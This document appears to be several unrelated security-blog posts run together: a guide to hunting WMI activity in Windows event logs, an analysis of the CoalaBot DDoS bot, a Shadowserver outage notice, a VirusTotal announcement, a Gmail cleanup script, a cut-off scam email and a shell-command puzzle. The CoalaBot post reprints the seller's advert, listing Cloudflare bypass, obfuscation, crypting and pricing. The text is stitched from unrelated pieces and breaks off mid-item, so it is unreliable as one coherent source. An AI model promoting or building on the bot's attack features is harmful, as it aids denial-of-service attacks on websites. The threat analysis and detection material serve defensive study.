We can now see the events that are specific for that eventlog. We can also see the amount of details we can get for each event, including the XML template for the message. This will be useful when we write XPath filters.

We can save them to a variable and pull the IDs for the events.

PS C:\> $WmiEvents = $WmiProv.Events | Where-Object {$_.LogLink.LogName -eq "Microsoft-Windows-WMI-Activity/Operational"}
PS C:\> $WmiEvents | Select-Object -Property Id

  Id
  --
5857
5858
5859
5860
5861

Provider Loading

Every time WMI is initialized it loads providers that build the classes and provide access to the OS and system components it exposes as classes and instances. Providers execute under the SYSTEM context; in other words, they execute with very high privileges in Windows. Several actors and Red Teams leverage malicious providers as backdoors so as to keep persistent access on systems. Many forensic and incident response teams do not look for new providers being added on systems or for suspicious existing ones. Some examples of malicious providers are:

In the list of Event Ids we saw, this would be event 5857, and in its structure we have some very useful information that is of great help when hunting.


As we can see in its structure, we have information on the ProcessID and thread that loaded the provider; we can also see the name of the host process and the path to the DLL loaded.

If we are using Windows Event Collector, we can create an XML filter with known providers and filter those out so we only see new, unseen providers. We can generate a quick list of the unique provider files with a bit of PowerShell:

PS C:\> Get-WinEvent -FilterHashtable @{logname='Microsoft-Windows-WMI-Activity/Operational';Id=5857} | % {$_.Properties[4].Value} | select -unique

We can turn this into an XML filter that we can use either with Get-WinEvent while hunting or with WEC for collection:

<QueryList>
  <Query Id="0" Path="Microsoft-Windows-WMI-Activity/Operational">
    <Select Path="Microsoft-Windows-WMI-Activity/Operational">*[System[(EventID=5857)]]</Select>
    <Suppress Path="Microsoft-Windows-WMI-Activity/Operational">
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmiprov.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmipcima.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\System32\sppwmi.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\vdswmi.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\DMWmiBridgeProv.dll']) or
    (*[UserData/*/ProviderPath='C:\Windows\System32\wbem\WmiPerfClass.dll']) or
    (*[UserData/*/ProviderPath='C:\Windows\System32\wbem\krnlprov.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmipiprt.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\stdprov.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\profprov.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\System32\Win32_DeviceGuard.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\System32\smbwmiv2.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\cimwin32.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\wmiprvsd.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\system32\wbem\scrcons.exe']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\system32\wbem\wbemcons.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\vsswmi.dll']) or
    (*[UserData/*/ProviderPath='%SystemRoot%\system32\tscfgwmi.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\ServerManager.DeploymentProvider.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\mgmtprovider.dll']) or
    (*[UserData/*/ProviderPath='%systemroot%\system32\wbem\ntevt.dll']) or
    (*[UserData/*/ProviderPath='%windir%\system32\wbem\servercompprov.dll'])
    </Suppress>
  </Query>
</QueryList>

WMI Query Errors

Event Id 5858 logs all query errors. The data includes the error code in the ResultCode element and the query that caused it in the Operation element. The process Id is also included, but in this event it is under the ClientProcessId element.


The error code is in hex format. Thankfully, Microsoft has a list of WMI Error Constants in MSDN that we can use to figure out what the specific error was. We can easily query for specific result codes using an XPath filter. In the following example we are looking for queries that failed because the specified class did not exist, searching for ResultCode 0x80041010. This could be useful if an attacker is looking for a specific class present on the systems, like a permanent event consumer he can modify for persistence.

PS C:\> Get-WinEvent -FilterXPath "*[UserData/*/ResultCode='0x80041010']" -LogName "Microsoft-Windows-WMI-Activity/Operational"

We could also search for queries that failed due to insufficient permissions.

PS C:\> Get-WinEvent -FilterXPath "*[UserData/*/ResultCode='0x80041003']" -LogName "Microsoft-Windows-WMI-Activity/Operational"


WMI events work by monitoring for specific events generated by the CIM database in Windows. WMI events are those that happen when a specific event class instance is created, or that are defined in the WMI model. Most events work through the creation of a query that defines what we are looking for, an action to be taken once the event happens, and a registration that binds the two together. There are two types of WMI event subscription:

  • Temporary – Subscription is active as long as the process that created the subscription is active. (They run under the privilege of the process)
  • Permanent – Subscription is stored in the CIM Database and are active until removed from it. (They always run as SYSTEM)

Temporary Events

Now that detection of permanent WMI events is more common thanks to several tools, some attackers have moved to temporary event consumers. These can be written in C++, .Net, WSH, and PowerShell; they use WMI event filters to trigger an action that is executed by the application itself. They are not common, but they are easy to write and operate as long as the application is running. We can track them with event Id 5860, which is created once the application registers the event consumer.

Here is an example in PowerShell of a temporary event consumer that simply writes the name of a process that has been launched. 

# Query for new process events
$queryCreate = "SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
    "WHERE TargetInstance ISA 'Win32_Process'"

# Create an action to take when the event fires
$CreateAction = {
    $name = $Event.SourceEventArgs.NewEvent.TargetInstance.Name
    Write-Host "Process $($name) was created."
}

# Register the WMI event
Register-WmiEvent -Query $queryCreate -Action $CreateAction

When the event consumer is registered with Register-WmiEvent, we get the following event logged on the system.


We can see that the query being used to monitor for events is logged under UserData in the Query element, and under the PossibleCause element we see that it is marked as Temporary.

Permanent Events

When a __EventFilter and any of the consumer-type class objects are used in the creation of a binding instance in the WMI CIM database to create a permanent event, an event log entry with Id 5861 is created. The event is also generated on modification, if any of the component class instances are modified. The event will contain all the information associated with the permanent event in the UserData element under the PossibleCause subelement.


When the __EventFilter or consumer that makes up a permanent event is modified, the same event is generated, but there is no field in the data to show whether it was a creation or a modification.

The event says to look at Event Id 5859 for the __EventFilter class that makes up the permanent event, but at the moment I have not seen an event created with this Id in all my testing.


As you can see, Microsoft has improved the native logging capabilities quite a bit in the latest versions of Windows. Sadly, this has not been backported to Windows 7 and Windows 2008/2008 R2. We are able to track:

  • Query errors
  • Temporary event creation
  • Permanent event creation and modification
  • Loading of providers

From a Red Team perspective, this lets us know that our actions can be tracked, and we should check whether these events are collected when we measure the level of maturity of the target. From a Blue Team perspective, these are events you should be collecting and analyzing in your environment for possible malicious actions.

CoalaBot : http Ddos Bot

CoalaBot appears to be built on August Stealer code (the panel and traffic are really alike).

I found it spread as a task in a Betabot and in an Andromeda spread via RIG, fed by at least one HilltopAds malvertising campaign.

2017-09-11: a witnessed infection chain to CoalaBot

A look inside :
CoalaBot: Login Screen
(August Stealer alike) 

CoalaBot: Statistics

CoalaBot: Bots

CoalaBot: Tasks
CoalaBot: Tasks

CoalaBot: New Task (list)

CoalaBot: https get task details

CoalaBot: http post task details

CoalaBot: Settings
Here is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.
(Thanks to Andrew Komarov and others who provided help here).
Coala Http Ddos Bot

The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.

Attack types:

* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.

• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7; on later versions of the OS, .NET 2.0 is disabled by default)
• ~100kb after obfuscation
• Auto Backup (optional)
• Low CPU load for efficient use
• Encryption of incoming/outgoing traffic
• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)
• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.
• Ability to link a build to more than one gate.

• Detailed statistics on time online/architecture/etc.
• List of bots, detailed information
• Number count of requests per second (total/for each bot)
• Creation of groups for attacks
• Auto sorting of bots by groups
• Creation of tasks, the ability to choose by group/country
• Setting an optional time for bots success rate


• Providing macros for randomization of sent data
• Support of .onion gate
• Ability to install an additional layer (BOT => LAYER => MAIN GATE)


• PHP 5.6 or higher
• Module for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensions


• Created tasks -


• $300 - build and panel. Up to 3 gates for one build.
• $20 - rebuild
The price can vary depending on updates.
Escrow service is welcome.

Help with installation is no charge.


VT link
MD5 f3862c311c67cb027a06d4272b680a3b
SHA1 0ff1584eec4fc5c72439d94e8cee922703c44049
SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f

Emerging Threats rules :
2024531 || ET TROJAN MSIL/CoalaBot CnC Activity

Read More:
August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Oops, We’re Doing it Again

  • freed0 – Morning all, how is everything going?  Glad we are not in that old data center any more.  There were those odd smells in there.
  • Chief Architect – We have to move again.
  • freed0 – Yes, it is a lovely day outside, I think I might just wander aimless around the parking lot.  You know I have to stay in shape for those rant walks I do with David.
  • Chief Architect – We have to move the Data Center again.
  • freed0 – lalalalalala
  • Chief Architect – It is happening in two weeks, we have been preparing for months while you have been hiding in your basement watching Anime
  • freed0 – Hey, it was classic Gatchaman!
  • Chief Architect – So, you need to inform everyone.
  • Stew – We should tell everyone the day after we are completed, much like all the Power Outages!
  • Senior Analyst – [Smacks Stew], bad Stew, bad, bad Stew


Well, I hope everyone remembers last year when we moved successfully.  At that time we acquired a larger space and started the arduous process of negotiating what would really happen to the new space and how the move would take place.  Move forward ten months and we finally have a set-in-stone move date.  Even that could have changed as of this week, but now everything is going ahead whether we like it or not.


Planned downtime:  2017-10-27 to 2017-11-03

Everything will go down on the morning of 2017-10-27. We are planning to have everything back up and running at full operational capacity by 2017-11-03, only sliding into the weekend in the event of unplanned complications.  The team will work to get services restored earlier if possible.

The Bad News

For about a week, our processing, analysis, and data repositories will be offline. That means there will be no reports, no malware analysis, no downloads, no API… in short, nothing will be available during that time. But sorry to all the black hat wearers out there: we’ll be back and bigger than ever, processing more malware, scanning faster, and sending out even more reports to those that fix the problems we find.

Did we show you the beautiful pictures of our current place?  It is so nice.  It almost makes you want to live there, except for the need of a parka.  Maybe the Norwegian team members can live there.

The Good News

The new space will be just as pretty, using the same racks and pods but a different cooling system, since we will be moving to a raised floor this time.  We will enjoy a 10% increase in physical space as well as a 15% increase in power and cooling capacity, plus four additional racks for us to fill.  Overall it will be a nice space; we will include pictures once it is completed, and it will all work out well for us and all of you.

How can you help?

Currently your reports are created from our daily scans of 3.7 billion routable IPv4 addresses on ~30 ports and our sinkhole collection of victims; we process around 0.5-1.5 million malware samples per day, distribute 30,000 to 40,000 daily reports to 90 National CERTs and 4,500+ customers, and generate some 120,000 charts daily.  As a US 501(c)(3) non-profit organization that does not charge for its services, we survive through tax-deductible donations and sponsorships, as well as funded project work to expand what we are able to do.  We share our data at no cost with direct network owners and National CERTs all over the world. We do not ask for credit, only the occasional support. If you think you might be able to help us out, please contact us by email at admin*at*shadowserver*dot*org.


This is just a part of business.  We just have to roll with it.

VirusTotal += eGambit

We welcome eGambit Artificial Intelligence engine scanner to VirusTotal. This module is part of the whole eGambit solution developed by TEHTRIS company, in Bordeaux, France. In the words of the company:

“eGambit, the Cyber Defense Arsenal, was created by the TEHTRIS company. This new take on cybersecurity, proposes unified enhanced technologies : advanced Endpoint Security agents, unlimited SIEM, Honeypots, NIDS, Deep Learning, etc. eGambit offers a worldwide 24/7 Security Threat Monitoring, Breach Assessment and Incident Response Service. In particular, the eGambit Artificial Intelligence engine module, deployed on VirusTotal, fight against unknown Windows malwares such as stealth spywares, ransomwares, keyloggers, viruses, etc.”

TEHTRIS has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by SKD-LABS, an AMTSO-member tester.

Automatically deleting old Gmail email

Like many of you, I’m a Gmail hoarder. I never delete anything; I just “archive” everything. I “might” need it later, or “I’ll get to it when I have time”. If we get really honest with ourselves, we never actually will get to it, and because we have this buffer, this procrastination opportunity, we grab it. We use words like “but I may need proof of X”, or “I could need to reference this”, or “I don’t really want to put this person in my contacts so I’ll just save the email”.

Personally, I have made a choice to force myself to be more engaged with my email going forward. I have set up a Google Apps Script to run through all of my email every day; if a message is older than 90 days and doesn’t have the special label “keep” on it, it’s gone. I obviously didn’t care enough about whatever was going on in that email to take the time to respond to it.

Whatever your reason for finding this post, here is how I got it done:

At first I started with just searching for a way to make a simple filter to do this. There are plenty of blog posts that show you this is possible, but it turns out that at some point Gmail switched to only applying filters to incoming messages (makes sense: lots less overhead, no need to load EVERYONE’s email every hour). This makes deleting messages older than X impossible with simple filters. I did, however, learn of a search query term you can use to find messages/threads older than X, imaginatively called older_than:. So a search in Gmail for older_than:90d resulted in exactly the emails I wanted to find.

That’s when I started looking into Google Scripting. The language is pretty easy and straightforward if you have ever programmed in anything like JavaScript or C++.

Using the API reference here: I was able to cobble together the following in about 20 minutes:

function DeleteOldEmail () {
	var threads;
	var thread;

	threads = GmailApp.search("older_than:90d");
	for (var i = 0; i < threads.length; i++) {
		thread = threads[i];
		GmailApp.moveThreadToTrash(thread);
	}
}

Now, that script leaves a lot to be desired. It doesn’t have any case where a label like “save” or “keep” might come into play; it just hauls off and deletes everything old. But before we start improving, let me show you how it looks when you’re actually doing it (I’ll comment out the moveThreadToTrash call in the screenshots).

Go to and you’ll be presented with a new project if you haven’t been here before:

Then, copy and paste the code in and save it. It’ll ask you to name the project. I just named it DeleteOldEmail. Feel free to name it anything you wish. It is what is going to show up in your Google Security “Approve Apps” list.

The first time I ran this I commented out the lines for deleting and added in a “Logger” line just so I knew what would be deleted:

function DeleteOldEmail () {
	var threads;
	var thread;

	threads = GmailApp.search("older_than:90d");
	for (var i = 0; i < threads.length; i++) {
		thread = threads[i];
		Logger.log(thread.getFirstMessageSubject());
		// GmailApp.moveThreadToTrash(thread);
	}
}

Then run it. The first time you run it, it will ask for permissions:

If you try this out and decide you don’t like it you can revoke the permissions here:

If you went with the logging you’ll see something like this if you go to View->Logs:

Last step is to set this up so it automatically runs, I mean that’s the whole point. For that, we go to Edit->Current Project’s Triggers. And we are greeted with the following (once we click to add a new trigger):

I chose to set up mine to run every 12 hours, but you can set it to run once a day, once a week, whatever.

Again, this script leaves a lot to be desired. You can totally mess with the query search string any way you wish. I’ve created a GitHub repository where I’ll put improvements to the script:

Have fun with it. The two improvements I’ll be adding are the label exclusion for “keep” and notifications (a list of email subjects deleted).
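For the curious, the label-exclusion improvement boils down to a filter over threads. Here is a minimal sketch of that logic; the helper name threadsToTrash and the plain-object threads are purely illustrative (not from the repository), and in Apps Script you would build each thread's label list from thread.getLabels() instead:

```javascript
// Sketch of the "keep" label exclusion, with threads modeled as plain
// objects so the filtering logic can be exercised anywhere. Only threads
// that do NOT carry the "keep" label are candidates for trashing.
function threadsToTrash(threads) {
  return threads.filter(function (t) {
    return t.labels.indexOf("keep") === -1;
  });
}

var sample = [
  { subject: "old newsletter", labels: [] },
  { subject: "tax receipt", labels: ["keep"] }
];

// Only the unlabeled thread is returned; the "keep" one is spared.
var doomed = threadsToTrash(sample);
```

Inside the real script, the loop would then call GmailApp.moveThreadToTrash only on the threads that survive this filter.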

Thanks for your time.

Scam: "Help Your Child To Be A Professional Footballer." /

This spam email is a scam:

Subject:  Help Your Child To Be A Professional Footballer.
From:     "FC Academy" []
Date:     Sun, October 8, 2017 10:30 am
To:       "Recipients" []
Priority: Normal

Hello,

Does your child desire to become a professional footballer? Our football academy are currently scouting for young football player to participate in 3-6

Episode #181: Making Contact

Hal wanders back on stage
Whew! Sure is dusty in here!
Man, those were the days! It started with Ed jamming on Twitter and me heckling from the audience. Then Ed invited me up on stage (once we built the stage), and that was some pretty sweet kung fu. Then Tim joined the band, Ed left, and the miles, and the booze, and the groupies got to be too much.
But we still get fan mail! Here's one from superfan Josh Wright that came in just the other day:
I have a bunch of sub-directories, all of which have files of various names. I want to produce a list of directories that do not have a file starting with "ContactSheet-*.jpg".
I thought I would just use "find" with "-exec test":
find . -type d \! -exec test -e "{}/ContactSheet\*" \; -print
Unfortunately, "test" doesn't support globbing, so this always fails.
Here's a sample directory tree and files. I thought this might be an interesting CLKF topic.
$ ls
Adriana Alessandra Gisele Heidi Jelena Kendall Kim Miranda
$ ls *
Adriana-1.jpg Adriana-3.jpg Adriana-5.jpg
Adriana-2.jpg Adriana-4.jpg Adriana-6.jpg

Alessandra-1.jpg Alessandra-4.jpg ContactSheet-Alessandra.jpg
Alessandra-2.jpg Alessandra-5.jpg
Alessandra-3.jpg Alessandra-6.jpg

Gisele-1.jpg Gisele-3.jpg Gisele-5.jpg
Gisele-2.jpg Gisele-4.jpg Gisele-6.jpg

ContactSheet-Heidi.jpg Heidi-2.jpg Heidi-4.jpg Heidi-6.jpg
Heidi-1.jpg Heidi-3.jpg Heidi-5.jpg

ContactSheet-Jelena.jpg Jelena-2.jpg Jelena-4.jpg Jelena-6.jpg
Jelena-1.jpg Jelena-3.jpg Jelena-5.jpg

Kendall-1.jpg Kendall-3.jpg Kendall-5.jpg
Kendall-2.jpg Kendall-4.jpg Kendall-6.jpg

ContactSheet-Kim.jpg Kim-2.jpg Kim-4.jpg Kim-6.jpg
Kim-1.jpg Kim-3.jpg Kim-5.jpg

Miranda-1.jpg Miranda-3.jpg Miranda-5.jpg
Miranda-2.jpg Miranda-4.jpg Miranda-6.jpg
OK, Josh. I'm feeling you on this one. Maybe I can find some of the lost magic.
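One quick aside before the main riff: Josh's "-exec test" idea isn't a total loss. You can hand the glob to a tiny inner shell and let "ls" do the existence check via its exit status. This is just a sketch, not what I ended up using, and the "demo" tree below is invented so the one-liner can be tried standalone:

```shell
# Build a toy tree (names invented for the demo)
mkdir -p demo/Heidi demo/Kendall
touch demo/Heidi/ContactSheet-Heidi.jpg demo/Kendall/Kendall-1.jpg

# Print directories that do NOT contain a ContactSheet-*.jpg file.
# The inner sh expands the glob; "ls" exits non-zero when nothing matches,
# and "! -exec" flips that into "print on failure".
find demo -mindepth 1 -type d \
    ! -exec sh -c 'ls "$1"/ContactSheet-*.jpg >/dev/null 2>&1' _ {} \; -print
# -> demo/Kendall
```

The "_" is a placeholder for $0 inside the inner shell, so the directory name lands in $1 and survives any weird characters in the path.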
Because Josh started this riff with a "find" command, my brain went there first. But my solutions all ended up being variants on running two find commands-- get a list of the directories with "ContactSheet" files and "subtract" that from the list of all directories. Here's one of those solutions:
$ sort <(find * -type d) <(find * -name ContactSheet-\* | xargs dirname) | uniq -u
The first "find" gets me all the directory names. The second "find" gets all of the "ContactSheet" files, and then that output gets turned into a list of directory names with "xargs dirname". Then I use the "<(...)" construct to feed both lists of directories into the "sort" command. "uniq -u" gives me a list of the directories that only appear once-- which is the directories that do not have a "ContactSheet" file in them.
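The same "subtract one list from the other" move can also be spelled with "comm", which some folks find easier to read than the sort/uniq trick. A sketch against a throwaway tree (the "shoot" directory and its contents are invented for the demo, and a GNU userland is assumed for "xargs -r"):

```shell
# Toy tree (names invented for the demo)
mkdir -p shoot/Gisele shoot/Kim
touch shoot/Gisele/Gisele-1.jpg shoot/Kim/ContactSheet-Kim.jpg

# comm -23 prints lines unique to the first (sorted) input:
# all directories, minus the directories holding a ContactSheet file
comm -23 <(find shoot -mindepth 1 -type d | sort) \
         <(find shoot -name 'ContactSheet-*' | xargs -r dirname | sort -u)
# -> shoot/Gisele
```

"xargs -r" just keeps "dirname" from running at all when no ContactSheet files exist, so an empty second list stays empty.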
But I wasn't cool with running the two "find" commands-- especially when we might have a big set of directories. And then it hit me. Just like our CLKF jam is better when I had my friends Ed and Tim rocking out with me, we can make this solution better by combining our selection criteria into a single "find" command:
$ find * \( -type d -o -name ContactSheet\* \) | sed 's/\/ContactSheet.*//' | uniq -u
By itself, the "find" command gives me output like this:
$ find * \( -type d -o -name ContactSheet\* \)
Adriana
Alessandra
Alessandra/ContactSheet-Alessandra.jpg
Gisele
Heidi
Heidi/ContactSheet-Heidi.jpg
Jelena
Jelena/ContactSheet-Jelena.jpg
Kendall
Kim
Kim/ContactSheet-Kim.jpg
Miranda
Then I use "sed" to pick off the file name, and I end up with the directory list with the duplicate directory names already sorted together. That means I can just feed the results into "uniq -u" and everything is groovy!
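The reason I can skip "sort" here is that "uniq -u" only needs duplicates to be adjacent, and find already emits each ContactSheet right after its own directory. A quick illustration of that behavior:

```shell
# uniq -u keeps only the "lonely" lines -- anything in an
# adjacent run of two or more gets dropped entirely
printf 'Adriana\nHeidi\nHeidi\nMiranda\n' | uniq -u
# -> Adriana
# -> Miranda
```

If the duplicates weren't adjacent (say, the ContactSheet files lived somewhere else in the tree), you'd need a "sort" in front of "uniq -u" again.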
Cool, man. That was cool. Now if only my friends Ed and Tim were here, that would be something else.

A Wild-Eyed Man Appears on Stage for the First Time Since December 2013
Wh-wh-where am I?  Why am I covered with dust?  Who are you people?  What's going on?

This all looks so familiar.  It reminds me of... of... those halcyon days of the early Command Line Kung Fu blog.  A strapping young Tim Medin throwing down some amazing shell tricks.  Master Hal Pomeranz busting out beautiful bash fu.  Wow... those were the days.  Where the heck have I been?

Oh wait... what?  You want me to solve Josh's dilemma using cmd.exe?  What, am I a trained monkey who dances for you when you turn the crank on the music box?  Oh I can hear the sounds now.  That lovely music box... with its beautiful tunes that are so so so hypnotizing... so hypnotizing...

...and then Ed starts to dance...

I originally thought, "Uh-oh... a challenge posed by Josh Wright and then smashed by Hal is gonna be an absolute pain in the neck in cmd.exe, the Ruprecht of shells."  But then, much to my amazement, the answer all came together in about 3 minutes.  Here ya go, Big Josh.

c:\> for /D /R %i in (*) do @dir /b %i | find "ContactSheet" > nul || echo %i

The logic works thusly:

I've got a "for" loop, iterating over directories (/D) in a recursive fashion (/R) with an iterator variable of %i which will hold the directory names.  I do this for everything in the current working directory and down (in (*)... although you could put a directory path in there to start at a different directory).  That'll spit out each directory. At each iteration through the loop, I do the following:
  • Turn off the display of commands so it doesn't clutter the output (@)
  • Get a directory listing of the directory indicated by the iterator variable, %i.  I want this directory listing in bare form, without the Volume Name and Size cruft (/b).  That'll spew each directory's contents on standard out.  Remember, I'm recursing using the /R in my for loop, so I don't need to use a /s in my dir command here.
  • I take the output of the dir command and pipe it through the find command to look for the string "ContactSheet".  I throw out the output of the find command, because it's a bunch of cruft where it actually finds ContactSheet.
  • But, if the find command FAILS to see the string "ContactSheet" (||), I want to display the path of the directory where it failed, so I echo %i.
Voilamundo!  There you go!  The output looks like this:

c:\tmp\test>for /D /r %i in (*) do @dir /b %i | find "ContactSheet" > nul || echo %i
c:\tmp\test\Adriana
c:\tmp\test\Gisele
c:\tmp\test\Kendall
c:\tmp\test\Miranda
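For the bash folks keeping score at home, that same "list it, search it, act on failure" pattern translates roughly like so (the "set" directory and its contents are invented for the sketch):

```shell
# Toy tree (names invented for the demo)
mkdir -p set/Jelena set/Miranda
touch set/Jelena/ContactSheet-Jelena.jpg set/Miranda/Miranda-1.jpg

# dir /b %i | find "ContactSheet" > nul || echo %i, more or less:
# grep -q is the "> nul" part, and || fires only when grep finds nothing
for d in set/*/; do
    ls "$d" | grep -q ContactSheet || echo "$d"
done
# -> set/Miranda/
```

Note this only walks one level of subdirectories; you'd reach for find (as Hal did) to recurse the way /R does.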

I'd like to thank Josh for the most engaging challenge!  I'll now go back into my hibernative state.... Zzzzzzzzz...

...and then Tim grabs the mic...

What a fantastic throwback, a reunion of sorts. Like the return of Guns n' Roses, but more Welcome to the Jungle than Paradise City, it gets worse here everyday. We got everything you want honey, we know the commands. We are the people that can find whatever you may need.

Uh, sorry... I've missed the spotlight here. Let's get back to the commands. Here is a working command in long form and shortened form:

PS C:\Photos> Get-ChildItem -Directory | Where-Object { -not (Get-ChildItem -Path $_ -Filter ContactSheet*) }

PS C:\Photos> ls -di | ? { -not (ls $_ -Filter ContactSheet*) }

Let's take it day piece by day piece. If you want it you're gonna bleed but it's the price to pay. Well, actually, it isn't that difficult so no bleeding will be involved.

The first portion simply gets a list of directories in the current directory.

Next, we have a Where-Object filter that only passes the proper objects down the pipeline. In the filter we look inside the directory passed down the pipeline ($_) for files whose names start with ContactSheet, and we simply invert that test with the -not operator: directories where nothing matches make it through.

With this command you can have everything you want but you better not take it from me... the other guys did some excellent work. We've missed ya'll and hopefully we will see you again. Now back into the cave to hibernate.